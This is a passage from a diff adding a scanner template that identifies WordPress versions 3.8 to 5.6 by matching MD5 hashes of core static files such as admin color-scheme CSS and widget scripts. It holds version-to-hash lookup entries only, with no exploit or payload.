md5(body))" + - type: dsl + name: 3.9.1 - 3.9.5 + dsl: + - "(\"fe275a56b9c9d2d4332f0df93a6d5260\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4a542ce8fe045da7e3048411e421ba28\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"1bbdc179b04731a40281f164ae2da2b0\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"49be97e35bba4ff1c426a6df80155e87\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"57aaf03ff9d4a85d6694c3c2d272195a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fb23e8dfbfb277faf246b3ae071de2c6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - 
"(\"b8eab0015d30532664714ef9c9cc4801\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"abfe8ead341e68cfee6625b6d5627a0d\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8ed466f8435d6b8464eda4d3282e1ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"92f604e25ad411a8ed016e06d21c44cc\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"030addbc8364e837fde9d573fa433329\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"e8e8c2726be86a0e5959689f83e68b4a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"28e1652d049ca7d1148616a9a65e4a84\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"df2e2d4114e8251bb20c7ab20d24cf37\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1ced6b0ebd2b03929234bb3754dac0e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/wp-content.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"012706854c5bf037e8234aab32868fc8\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"dd1d6bb4548f4ee2ab740d8ba89b1b35\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"78532b5f1feda917ca31dc124122036a\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"8a9b561b793a96bad45a0b3034a260cf\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"07743f0d829a3e47573f7bdf68760ff9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"16f8552760a0f3145c25184108b9a2f2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fa017da44bc83b2b437dbd75623012d7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f1aacaf6e127e33987f04a8304d4764d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1cd99e8652d4e846316f6af433bc58b6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"f6c2d0436843a5aa1a7fb39eeb6561b1\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1b587c086fe03c005a9f2f4fca8afecf\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"358d04384b5ffaf9f39f6055b5d274a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"3f256721ed5311483335c0067e619f54\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"78379f2a26af532dad0097d4521508e1\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.3.6 + dsl: + - "(\"8091ca12bafbea286c007455dd00ed62\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"81fc83c10f836091c606556e000d88b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"c1fd80a457b96b2fe7aecf56afe62fd3\" == md5(body))" + - type: dsl + name: 4.8.1 + dsl: + - "(\"2eda0fba7c33c68b92a25d71e49f24f7\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"bff1d54a16cd5b99c51bb68b6d9cde1b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"62f4cd853c19bd9b7e2836395d2ffcf6\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"b767d49874c4dc6a0381b45973d41152\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"22a80b79f36eac9e6b9c1c60e217ac47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b7da29baf0549e017bdeaa2d836db37b\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"27fe3311345b14cc022a9682a0e658da\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"365dc556b970abfe2840e817186cdf42\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"190bf976f841dfc921911f6aaf812b81\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"54ae8d249d7e018ff9f44e8de2ff7a73\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - 
"(\"fa7377e0da20941e25af2944599e42db\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"14dc424b662c53b5f48fecdc03772c88\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"c12daa75772a539d80c0bfffae2db05d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"3a92e071e9dcec15972d4952c9bbe996\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ddef4827730dca9bd4f3a4d0deb11449\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"02160ddc16e5daa2ad1bf211dcc6914f\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"d46efe6ed170dbdd5b1b09ca55a35569\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"084491ba9b612bfaf8a5206e445e0845\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"55d1c98c7185470d72930e7690f9168c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"535a474e0799c2da9168379230ea07fd\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"13fe85bf5c96a042969ca526e87077c7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dfedff5a5003bd85df8740d7589d17c4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cb97bb7d8f7b5813d00c74f495df42e4\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"8b29881cd8a024af1c890f689893e50b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"9338a0c97b787ee5a176b5cd7e830061\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"99211a5746557a4d67717867f9ae8c62\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"929931f07eb6f9063098fb589b618d52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3518d1b1e45e704aeecc47c0b5e5fae0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8d7de25287ecf81d4e0d04534fa900d0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - 
"(\"11cc83c491b4dadcb47aa960562385fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9603270ee78215cb5372db4ee9ff4d34\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"47ec7f3b440692e1d196533fac8e2ded\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f91d3fa65fded514fdc32d5e48fa7eb9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2300f3cb6ec82e006d841f5b24a3374c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a9505503536e4d8709a8751e2a03bfab\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"2651332a375f96ccacd875fc87d9613e\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"972821b1f65532c5ee37170add513ed8\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"68051b391e123c7f627fb6532d169f1a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"84449df9bef860843f536972b82c8742\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f9672f0bd5557a33098c1be90036dd6f\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"129c377e3bec6b64007097e246a55b6e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"55a0910147a43f0be506255b7232090f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"644b1f497f37168efa0876e9a41c3a35\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d69489d26322d01d3b284a6b71a65f9a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"80e102718830b90c49d2d0bb280629c2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4e5f19d15fc3adfb371fdf5e050c8b9d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"eeccabc9952f2e1ba54a7b4abd49fafc\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"18340a88bc601743b7c70439cec488ed\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"633d5348edb8b8d16a1e5c73483fa94a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"886bbb60c2a052bdce63ec9fb620718a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c016c36ec090f0aa83236b712e01dc5f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"ddb7190d0c587934f493391b1edbccf4\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1eabb79616c817d36c47003b9ac16aa0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"096b4b8513175c73b8879474611d6a0d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ba77e07e130710f8d3c5125fac3ac14d\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"37af32fba1f76c7699f53034138a5853\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"10a5a7deb7dc77912ba0d9a24d3ce8e2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"ddf1a9c32c6b7c8f2839c03446c60db1\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"8cc327c4f903ca467722dded1259e72f\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"e05488e16a8e2b95591cd65507afe911\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ce122c37c5c54caea5e961c433149a71\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8f053c22ff721fc2522e7479ca836404\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4649feeb88af0d20436a518f89034c19\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"36da31029014d5cba2e1d6b2c3c94903\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"509e5f9805d5371f6afc4135fd361979\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7dcd4b68ece82d3d9cc5be62d079244d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"498b30f5cba3b1901b40567201b0700f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"43709ad04cfe4981c074767db4cec654\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e048709f08faeac3e1fdd8fb27869f0e\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"6dcfd9b5c29f86a7338bb35b5026fc0d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5a9869897cc9f0c7b41f4b03dbb86f58\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"44d81cafa065734abdb9239bc26e2c18\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c3b594ce028a37cad08301b857e7dec7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1f288a158ad8d61c363da63dfba3ce88\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec86a046d8ac3cfec1b3f2511d713af4\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b3e25847e2b09d594b37007464689fff\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"9bc1b13e10b32fd568b3d3fbd1503357\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f25aff923e7408ae683fea1f1e4127a2\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"5f6c9a9233a9b01c16d32a00dd3301f4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"01dc03bb80f16b38e95ac5a0ce98873e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"0193d4dcc30f98ff251feedf560eb32d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"aa7bd8d45c649f750fd00e59a4565c72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cbd6a9357f52f0a04bcd515642794f03\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d1ee46c95c1fee5816652ee120a70f6b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"32e6c9b314aa09741b00f3d25cbe93f8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e4274ca15d4a38aea20259bb83776ee5\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"f090d9aa28ba371afd6f6b0b4e1969f2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1579864ea35ebc26521222e136a961e7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0c5569b8a2822ed086e78645b0c9f1de\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"81182ae080141e8caa991886071853e0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dab7d054761842a41231761529e35c9d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"b31e789f4c8dea9698cd4eb0c9d1f48d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"64d732bae20f1bd9f1a39d28f479a35a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"83667ac765db3b096efae880799fba9b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"84292fd29fb971d80e6a76ba0b5252c6\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"bed194a77cb90e543b2ac3ea1c5e1c24\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"dc6ebc6bdf60e83bd93105a5f67b793d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f86f42cf3ea35d6a9c823366d3ca9b8a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"15a1fe1b601c5da6101f06d6430671d0\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"3ee5bb2a6e6a2251b99f91d353b2d984\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e0f9becb2dd284efbc3fcad8243ff792\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0c90b3ca5dee78323591408173a74c0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"c2718052027e9d64f65fdcc683368af7\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"bc5202c7967dc638e75867f7b8a8b32f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4bd6b6b92b306b97ba3de1c2421fc3e8\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"6a4efa94b2b654bef45f862cd92278ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"be0732f8240abe60df1783354817ade5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5889a9c995d14bafefe1e5c886333930\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"66666c9489057795c2fee523d4403546\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c54630e1b0b4d089bbd6eef6bde0d456\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0013fe5659a7e14442d3b2aa5af4a89d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e21cc147dadf70a8ec27483f9663a088\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6c5a320447670be2deb734eddda4dda1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"991698abb4180f23c4b7cba489523fe9\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"f5e26181e72a0e064669c5c1c7ee902e\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"d5f4c00a19c9ff0ad97c4ad53776af9e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c25f45bff5d0545cb0244345338939d7\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"b994fe4dc1ef5cd815f63ca00be88b2e\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"1dced46a49d62dd08e7f69e3f16d286b\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7d9d2c7d00a0dd30b706387aff516ed9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"39fbedd44ca7a270b0e7a5fab2e474b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e15962b9d758ca2c599163ff60c6d528\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"7c366a0f8539b65522d1f9b537a3dbfd\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8c45e2cf777e40fe8b03318f0a193157\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"ca11cd01b2e32f152a3e8c6a74a85811\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"83453647da515355dc45a661ab42ea38\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"11c1107a87cc83ff1df4e588554e349a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8a605f4b01b48f4a6efa39949154c1a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a7d3f86196983532af392984f57ba5f0\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"16115bd9c26d4331c193d20895a2f8ec\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4b919105096d441f974a99dc6bc9e243\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ce3859134e2fef6f56088bc505f46b48\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1b5f74ec13f8502f5786b2aa39d7d901\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b2876ba5e8d94b461debeaefbcbe58ed\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"95b305399ec12bf249cd6b2cc86326a1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0d1a0d8f3ab5b6e25f4f103f1d3cf86b\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"77b44680773c336a5659fc5a9c9fde6f\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"0e6724bfb006014e90657b5c56e32f5d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"3d3fa848ebeee0e47d8413f2eac194cf\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9cedba0f9265f1b2b08d9138ad1bb036\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"51f80d9f509d4e6b4ea38713046e191b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b21f32953ad167424e9997c8ff5330ae\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"4aedfb3a03d238a248b4628c1e82ecb6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - 
"(\"4dd99f07b59e50a102badca4bc47cca6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c3e46fa1074909ce32b410a3c854f4c8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9538ad4bdbecfe10e0bfac3898ee6286\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c6cba3cc3536f8a8fe608a3d0a9f2f77\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8e0f8b89694e5b4a5d0ba46a6131216f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"baee08bf04fae25e404d79ad8a453441\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"e88d7626123a0d67492d7bc7546acb5d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"71e7589f78c5423719c15ebe510f4d25\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"738e2988d6f176a6417259f9514d5ee4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"848a1e64ad9724ed9e0a9c6d82069f3a\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"6238d0ebc1d2a983d66751824f6cb346\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"277685e5afc03cf65a847209b79d1726\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5e052b9c314c8bb2e0bc7fede0cf99f4\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4f949efcb806d798e79ebdf9aaf3b2ed\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"354c7b8d83ff3082546ce84bc35b68fa\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"76c9149b643865cb7eda2c945a277f26\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"76ecad6845904edb3738a64d07f44400\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"46d310711143ee1c98f788eeed72f49e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"093dcce1588c3b8cc4b40fc311974412\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - 
"(\"2c7b7f7ea3d09d89912f8a2190caf555\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a5e5038516f1c5931a290a13aff1a7c6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f906280467b81f0c303c11ecf5449a11\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"58f1d1b2e4ed824585e5cfa1757f49c1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1d4145177c30d6f02944c86d0b58f102\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"7b047656b2f21f7355ee6745b28de219\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1a4202bd816477e41390b35e6f23a9e6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"650ae2f4d9930650021832a5b414e780\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"cf22f6cdf0c754d17e18968603839536\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"77c6202426a5983dffd4b82d6e2b765d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"178e8fa9b390e7f0054063aacf4adc81\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"8baf66f851e91365c2a21a3fbf653055\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"0ed3663628636356a6c1d4a5860ed575\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8f458bd7c92c980080e17ae981fecc2c\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"07ce24d7e0075965b3276d32c9fdfc22\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"137ebc979d28ffb33eb9b131df733331\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"637446b49f93150cbc269d734466eba9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1395526a63e11cad214746d1a5367040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f9eaa22ba873fe30c5adecec9275dfef\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - 
"(\"0657508b14c063564f0001878ea88d07\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d55664f8f653664ce2f4a360a7aabf7e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2155bdba4f4aa5090b8b8fe168c537f6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1c2a62ec116bd5398f75e699028af52d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7828a09a10e456933f4f44a27bc9e760\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"088645d63d59b9e2b876d25ecea8b591\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"4995824719b80769472867ab6a0f9d6e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6c2f1e4fbe3db1322b38e577bceeeb25\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"8234cd28ef883f225abf8061ccd3af9b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"bd3be68c8212aeabe5af215df5e0d0cb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7636b2ab8523286785d75fd3d7e537e4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"acb549c4ac075b8c2af1138b234cf093\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: 